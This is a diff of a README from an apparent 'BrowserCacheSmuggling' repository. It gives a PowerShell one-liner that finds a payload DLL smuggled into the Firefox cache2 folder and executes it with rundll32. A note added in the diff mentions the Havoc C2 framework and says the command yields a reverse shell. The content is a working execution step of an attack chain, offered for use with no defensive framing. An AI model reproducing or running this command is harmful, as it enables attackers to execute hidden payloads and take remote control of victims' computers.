surya-dev-singh/BrowserCacheSmuggling/README.md

 ```powershell
 foreach ($files in @("$env:LOCALAPPDATA\Mozilla\Firefox\Profiles\*.default-release\cache2\entries\")) {Get-ChildItem $files -Recurse | ForEach-Object {if (Select-String -Pattern "ENTRYPOINT" -Path $_.FullName) {$dllPath = $_.FullName + '.'; rundll32.exe $dllPath,MainDll}}}
 ```

-and we will get our reverse shell !!
+**NOTE:** From the above command , make sure when u are running the dll file from rundll32 , you provide proper entry point eg (MainDLL) , which may be different for havoc C2. and we will get our reverse shell !!